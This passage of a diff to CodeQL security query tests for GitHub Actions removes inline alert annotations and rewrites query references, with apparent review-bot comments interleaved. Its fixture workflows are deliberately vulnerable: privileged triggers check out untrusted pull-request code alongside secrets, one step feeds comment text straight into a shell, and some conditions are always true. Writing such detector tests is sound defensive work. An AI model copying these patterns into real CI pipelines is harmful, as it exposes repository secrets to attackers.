.github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref index 9855767d1a86..89db21d70f59 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + 
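Review bot: The rewritten CachePoisoningViaPoisonableStep.qlref keeps a second, empty line: its hunk header is `@@ -1,2 +1,2 @@` and the query path is followed by a bare `+`. The other .qlref files converted later in this patch (UntrustedCheckoutTOCTOUCritical, UntrustedCheckoutTOCTOUHigh, ExpressionIsAlwaysTrueCritical, ExpressionIsAlwaysTrueHigh) shrink to a single line (`+1`). Drop the empty added line so the file is just `Security/CWE-349/CachePoisoningViaPoisonableStep.ql`. The test runner probably ignores the blank line, though nothing on this page confirms that, and keeping this reference in the same shape as its siblings avoids a needless difference between the security query tests.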
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index abea1002fd38..a4acd7387660 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh - test3: # $ Alert[actions/untrusted-checkout-toctou/critical] + test3: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml index abea1002fd38..a4acd7387660 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml 
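Review bot: After these two hunks nothing in comment.yml says which steps the untrusted-checkout TOCTOU query is expected to flag. The `# $ Source[...]` and `# $ Alert[...]` markers are removed from both `run: bash comment_example/tests.sh` steps and from `test3:`, so the only remaining record is the line/column ranges in UntrustedCheckoutTOCTOUCritical.expected. If the inline-expectations postprocess has to go, a plain trailing comment on the flagged steps, for example `# flagged by actions/untrusted-checkout-toctou/critical`, would keep the intent readable for whoever next edits the fixture. That comment should not move the reported step locations, but the .expected output would need re-checking. The same applies to test0.yml, test4.yml, test5.yml and test6.yml in this directory and to the CWE-571 and CWE-829 fixtures later in the patch.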
@@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh - test3: # $ Alert[actions/untrusted-checkout-toctou/critical] + test3: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml index 937f223a5a2f..9444ad0b627c 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -82,8 +82,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Environment setup uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical] + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml index 5cd25eb52cba..e3e557cc5112 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml 
@@ -90,7 +90,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Get environment from comment id: environment shell: bash env: @@ -153,7 +153,7 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Deploy server if: >- ${{ (contains(github.event.comment.body, '/deploy to') || @@ -166,7 +166,7 @@ jobs: COMMENT_BODY: ${{ github.event.comment.body }} run: poetry run python server.py --endpoint_location=remote --autodeploy=True - - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Deploy scorer if: >- ${{ contains(github.event.comment.body, '/deploy as async scorer') || @@ -177,7 +177,7 @@ jobs: PR_NUMBER: ${{ github.event.issue.number }} run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True - - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Set latest commit status as ${{ job.status }} uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml index bf14336adb66..4a6d1452af24 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -44,7 +44,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high] + - name: Install GH CLI uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords 
@@ -94,7 +94,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high] + - name: Log into Azure uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} @@ -164,7 +164,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical] + - name: Get pipeline info from comment id: pipeline-info run: | model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ @@ -215,13 +215,13 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Kickoff run if: contains(github.event.comment.body, '/kickoff') env: BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} - - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] + - name: Set latest commit status as ${{ job.status }} uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index cf212950f1e2..da66ff822a39 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -1,14 +1,3 @@ -#select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | 
@@ -107,3 +96,14 @@ edges | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref index c4a686750f37..f924f8fe750c 100644 
--- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref index 67d2bf06c396..6284c786b3ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -1,2 +1 @@ -query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index e3b1c4047f8a..bbbcc5aaa791 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -16,7 +16,7 @@ jobs: ${{ 1 == 2 || 3 == 4 - }} # $ Alert[actions/if-expression-always-true/high] + }} run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ 1 == 2 }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high] + if: ${{ 1 == 1 }} ${{ 1 == 2 }} run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ 1 == 2 || - 3 == 4 }} # $ Alert[actions/if-expression-always-true/high] + 3 == 4 }} - name: Test 9 if: '${{ 1 == 2 }}' run: echo "Test 9 should not be printed" 
@@ -53,10 +53,10 @@ jobs: if: "${{1 == 2 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] + if: " ${{ 1 == 2 }}" run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] + if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || 1 == 2 - )}} # $ Alert[actions/if-expression-always-true/high] + )}} run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || 1 == 2 - )}} # $ Alert[actions/if-expression-always-true/high] + )}} run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high] + if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high] + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high] + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high] + github.event.workflow_run.conclusion == 'success' }} run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml index 10688938a010..8b863037e29b 100644 
--- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -16,7 +16,7 @@ jobs: ${{ github.actor == "foo" || 3 == 4 - }} # $ Alert[actions/if-expression-always-true/critical] + }} run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ github.actor == "foo" }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical] + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ github.actor == "foo" || - 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical] + 3 == 4 }} - name: Test 9 if: '${{ github.actor == "foo" }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{ github.actor == 111 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] + if: " ${{ github.actor == 111 }}" run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] + if: " ${{ github.actor == 111 }}" run: echo "Test 12 should not be printed" - name: Test 13 if: | 
@@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || github.actor == "foo" - )}} # $ Alert[actions/if-expression-always-true/critical] + )}} run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || github.actor == "foo" - )}} # $ Alert[actions/if-expression-always-true/critical] + )}} run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical] + if: ${{ github.actor }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical] + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical] + if: ${{ github.actor }} != "" run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.actor == 'foo' && - github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical] + github.event.workflow_run.conclusion == 'success' }} run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref index 0c665471cafc..823f802a70f2 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref index 546bb9dd0c9a..f12135bd1b88 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -1,2 +1 @@ -query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 47151cec6dea..cd4f0fe660aa 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -8,6 +8,6 @@ runs: with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 - - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical] + - run: echo "foo" shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml index ad2a67b14bb3..4241647d3e11 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action] + - run: | mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip shell: bash 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml index ac4364695ee4..0c2059521020 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | # $ Alert[actions/unversioned-immutable-action] + - run: | mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip -d /tmp/artifacts shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml index db50d733137b..782505cc698d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml @@ -2,5 +2,5 @@ name: Composite unpinned tag test runs: using: "composite" steps: - - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@v2 - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml index 369412a9c4d1..08a25646d6ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml 
@@ -16,11 +16,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml index 42322833ce72..7eaee9fa6d38 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -8,12 +8,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + uses: dawidd6/action-download-artifact@v2 with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - id: pr_number # $ Alert[actions/artifact-poisoning/critical] + - id: pr_number run: | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) - echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical] + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml index 44e8a18d733f..f8d3736dba51 100644 --- 